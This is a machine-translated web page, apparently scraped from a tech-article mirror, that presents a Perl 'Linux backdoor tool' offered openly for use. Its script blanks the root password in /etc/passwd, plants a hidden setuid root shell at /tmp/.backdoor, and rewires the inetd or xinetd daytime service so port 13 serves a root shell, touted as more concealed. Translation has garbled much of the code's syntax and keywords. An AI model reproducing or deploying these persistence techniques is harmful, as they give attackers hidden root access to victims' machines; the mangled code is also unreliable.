Use a linux backdoor written in perl to load programs
Source: Internet
Author: User
Use the linux backdoor loader program written in perl-general Linux technology-Linux programming and kernel information. The following is a detailed description. Print "++ linux Backdoor tool ++ \ n ";
Print "usage instructions, there are three modes: rushroot, fakebackdoor, and rushport. rushroot adds an account to passwd, and the user name is root, the password is null. n fakebackdoor is bound to a shell to/tmp /. in backdoor, the root shell is obtained directly after running. The rushport is bound to the port \ n in the daytime service. There are two versions, one for redhatlinux7.0 -- rushport1, one is for redhatlinux7.0 and later -- rushport2. \ n General servers do not enable this service, and the program automatically activates the daytime service, telnet to Port 13 to directly obtain rootshell. This method is more concealed than \ n in the first two. Remember to restart the daytime service to take effect. \ n eg: rush rushroot. There are many optimizations to the program, if you have any improvement, please email to gaomeigaocuo \ @ hotmail.com \ n by rogue my whole life \ n ";
$ Parameter = @; ARGV [0];
Chomp $ parameter;
If ($ parameter = "rushroot ")
{
& Rushroot;
}
Elsif ($ parameter = "fakebackdoor ")
{
& Fakebackdoor;
}
Elsif ($ parameter = "rushport ")
{
& Rushport1;
}
Else ($ parameter = "rushport2 ")
{
& Rushport2;
}
Sub rushroot
{
Open (PWD, "/etc/passwd") | die "cannt find the shadow file! \ N ";
While ()
{
Chop;
$ Passwd. = "$ _ \ n ";
Last;
}
Chomp $ passwd;
If ($ passwd eq "root: x: 0: 0: root:/bin/bash ")
{
$ Passwd = ~ S/x // g;
Print "rushroot success! Now you can get a rootshell with null passwd ";
}
Else
{
Print "faild... something wrong ....:(((";
}
While ()
{
Chomp;
$ Passwd1. = "$ _ \ n ";
}
Close PWD;
Open (PWD, ">/etc/passwd") | die "why? ";
Print PWD $ passwd;
Print PWD $ passwd1;
}
Sub fakebackdoor
{
@ Cpsh = ("cp", "/bin/sh/tmp/. backdoor ");
@ Chmod = ("chmod", "u + s/tmp/. backdoor ");
System (@ cpsh );
System (@ chmod );
Print "success! Now you can use./tmp/. backdoor to get a root shell \ n ";
}
Sub rushport1
{
Open (RH6, "/etc/inetd. d/inetd. conf") | die "cannt find the shadow file! \ N "; # You can modify the path based on different versions.
While ()
{
Chomp;
$ Passwd. = "$ _ \ n ";
Chomp $ passwd;
If ($ passwd eq "daytime stream tcp nowait root internal ")
{
$ Passwd = ~ S/root internal/bin \/sh-I/g;
}
Last;
Close RH6;
Open (RH6, ">/etc/inetd. d/inetd. conf") | die "faild... :("; # You can modify the path based on the version.
Print RH6 $ passwd;
Print "success! Now you can telnet romote host at port 13 after reboot the daytime session \ n ";
}
}
Sub rushport2
{
Open (DAYTIME, ">/etc/xinetd. d/daytime") | die "can't open file! ";
$ Daytime = "service daytime \ n {\ n disable = no \ n server =/bin/sh \ n server_agrs = -- norc \ n id = daytime-stream \ n socket_type = stream \ n protocol = tcp \ n user = root \ n wait = no \ n} \ n ";
Print DAYTIME $ daytime;
Print "success! Now you can telnet romote host at port 13 after reboot the daytime session \ n ";
}
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.